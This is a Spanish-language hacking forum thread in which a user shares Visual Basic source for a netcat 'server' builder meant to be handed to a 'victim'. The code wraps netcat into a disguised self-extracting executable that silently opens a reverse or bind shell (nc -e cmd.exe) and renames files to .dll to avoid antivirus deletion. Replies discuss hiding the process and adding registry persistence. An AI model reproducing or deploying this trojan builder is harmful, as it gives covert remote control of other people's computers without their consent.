Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 3 Visitantes están viendo este tema.

WHK

Servidor NC 1.2

Bueno.. hice un programa bastante improvisado pero bastante efectivo para solucionar el problema de muchos...
La ides de este programa es crear servidores de netcat.... solo le pasas a la victima el ejecutable y ya tienes la shell sin compilar nada.
Lo bueno es que cuando abres la carnada no se ve ni un pantallazo del DOS como se hacia antes.



Tanto el programa como el codigo fuente está disponible como siempre en http://512.iespana.es/nc

Codigo:

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Private Sub Command1_Click()
sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% " + Text4.Text + " " + Text5.Text + " ^^^|cmd.exe^^^| " + Text4.Text + " " + Text6.Text + " -d ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub

Private Sub Command2_Click()
sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% -d -e cmd.exe " + Text2.Text + " " + Text3.Text + " ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub

Private Sub Command3_Click()
Dim hShell As Long
Dim sCmd As String

sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% -L -d -e cmd.exe -p " + Text1.Text + " ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)

End Sub

Private Sub Command4_Click()
End
End Sub

Private Sub Command5_Click()
Form2.Show
End Sub

Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Unload Me
Form2.Hide
End
End Sub
'Creado por WHK para el foro de elhacker.net


Martín Fierro

Felicidades compadre, nunca se me hubiera ocurrido, hacerlo así.....

La pregunta estriba respecto a que los join.dll y el rar.dll así como el nc.exe vienen comprimidos en el ejecutable o lo traes en una carpeta, no he bajado el archivo y te pregunto a rajatabla.

Veo si lo traduzco al autoit para que no necesites dlls y las dlls tools se compriman en el mismo ejecutable.

De verdad que me admira tu ingenio... Lo hubiera hecho yo si se me hubiera ocurrido, también he manejado el rar en línea de comandos, aunque el join.dll sí que no lo conozco...
Y no me importa nada..

WHK

#93
Para nada compadre... en realidad el nc.dll es el mismo netcat con extension .dll para que no lo borren :p, es mas... renombra nc.dll a nc.exe y veras el netcat con el icono modificado por el resourcehack, el rar.dll es el rar.exe utilizado para crear el empaquetado en modo consola... el join.dll es la base de otro programa que hice comprimido para que se fusione con el netcar mas las instrucciones dadas por el server-nc.. en realidad hace un copy join.dll %random%.exe donde %random%.exe [comando]
Con esto de %random% lo hice para que puedas enviar todas las shells que quieras sin que te cause nungun problema al dar una segunda.
En otras palabras realmente no son dlls sino partes del mismo progrma que les puse extension dll para que no los borraran y funcionaran como dependencias.
--------------------------------------------------------
También incluí en las descargas el Ejecute Invisible 1.0 que tuve que hacer en visual basic para poder ejecutar el netcat... está con codigo fuente y todo:

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Private Sub Form_Load()
On Error Resume Next
Dim LTD As String, F As Variant
Open App.Path & "\ejecutar.txt" For Input As FreeFile
Input #1, LTD
Text1.Text = LTD
Close #1

Dim hShell As Long
Dim sCmd As String

sCmd = "cmd /c " & Text1.Text
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End
End Sub
'Creado por WHK para el foro de elhacker.net


Como se ve no se mucho de programación pero si tengo harto ingenio :p

Como siempre en http://512.iespana.es/nc
Este espacio en mi web es exclusivo para el foro y no para todo el resto del publico para que despues no digan que me cuelgo del foro para levantar mi web  :P ademas no lo necesito

Martín Fierro

Cita de: WHK en  1 Mayo 2007, 23:46 PM
Para nada compadre... en realidad el nc.dll es el mismo netcat con extension .dll para que no lo borren :p, es mas... renombra nc.dll a nc.exe y veras el netcat con el icono modificado por el resourcehack, el rar.dll es el rar.exe utilizado para crear el empaquetado en modo consola... el join.dll es la base de otro programa que hice comprimido para que se fusione con el netcar mas las instrucciones dadas por el server-nc.. en realidad hace un copy join.dll %random%.exe donde %random%.exe [comando]
Con esto de %random% lo hice para que puedas enviar todas las shells que quieras sin que te cause nungun problema al dar una segunda.
En otras palabras realmente no son dlls sino partes del mismo progrma que les puse extension dll para que no los borraran y funcionaran como dependencias.
--------------------------------------------------------
También incluí en las descargas el Ejecute Invisible 1.0 que tuve que hacer en visual basic para poder ejecutar el netcat... está con codigo fuente y todo:


Ya lo estoy viendo, conozco la técnica, yo lo hice igual con varios programas, incluso puedes empaquetarlo con el Fusion en el mismo ejecutable, el nc.dll y el cryptcat.dll los tengo así en varios programas que hice para GUI de ellos, también hice un manager GUI para wget y use la misma técnica.

Sipo le entendí a tu código a la primera, pero si te confieso que el del join si no lo identifique.

Enhorabuena, te digo ya vere con tiempo si lo paso a autoit y claro te doy el crédito.

Hace tiempo que renuncié al VB para adoptar el autoit que es menos pesado y necesita menos ocx y demás, además es más Basic.
Y no me importa nada..

WHK

join.dll es un ejecutable winrar SFX donde dentro está el ejecute_invisible.exe ... lo que hace el programa es renombrar nc.dll a %random%.exe y a rar.dll a rar.exe y con todo eso comprimir el %random%.exe + ejecutar.txt dentro del rar ejecutable con el nombre propuesto en text1.text
si kieres verlo puedes abrirlo extrayendo ficheros con winrar... es mas.. al servidor puedes cambiarle el icono con el mismo winrar y es completamente configurable para el que tenga conocimientos un poco mas avanzados, pero por ahora asi como está es ideal para los que re100 estan aprendiendo. y ojo que las librerias no deben ir en ningun otro lado que no sea en el mismo directorio (carpeta) donde está el programa ya que no son dll reales... como dije.. no se mucho de programación asi que use la imaginación para juntar el rar en modo consola y un winrar sfx para que el servidor-nc haga las configuraciones necesarias sobre ellos.

WHK

El que quería usar el Net Cat para entrar en los IRC la respuesta estaba aca mismo:
http://foro.elhacker.net/index.php/topic,93666.0.html

Grave

Cita de: WHK en 25 Marzo 2007, 05:32 AM
Como puedes ver… acá mostré como hacer interactuar el netcat con un servidor y transformarlo en un anonimail XD o ftp client… también puedes hacer un consultador SQL, un bot IRC, un cliente tftp… etc etc etc… es solo cosa de imaginación

Me referia a eso :¬¬
"y el conocimiento os hara libres"

Module Console1
   Console.Write("Hello Word")
   Console.ReadLine()
End Module
http://aion.cr0n0triger.operaunite.com/

diorena

hola sabes tengo un problema ya que baje el netcat y el reshack pero no me funciona nada a pesar de seguir tus instrucciones al pie de la letra, ademas te cuento que baje e reshack y esta en español lo cual es diferente a lo que tu tienes en el tema, me podrias dar una pauta de donde bajar el reshack en ingles ya que no lo encuentro o bien iluminarme en algo que puedo estar haciendo mal de antemano gracias.

muy buen tema y muy interesante gracias

nica

#99
baja el programa que puso whk, en realidad si funciona, lo unica pregunta que tengo es que kuando uso un scaneador de puertos, mas especificamente el nmap este no me arroja que tengo abierto ese puerto... por que???


* donde se puede modificar o se puede agregar al codigo que no se cree el ejecutable 31823.exe, por que se mira todo sospechoso en el administrador de tareas
* lo otro es que se crea en la carpeta de los temporales del usuario en donde se ejecuta, pero se crea en alguna otra carpeta???


** me puse a pensar que al final de las cosas y para mientras uno se logee usando el server de whk se puede subir el netcat siempre troyanizado a otra carpeta y agregar la ruta al registro de windows.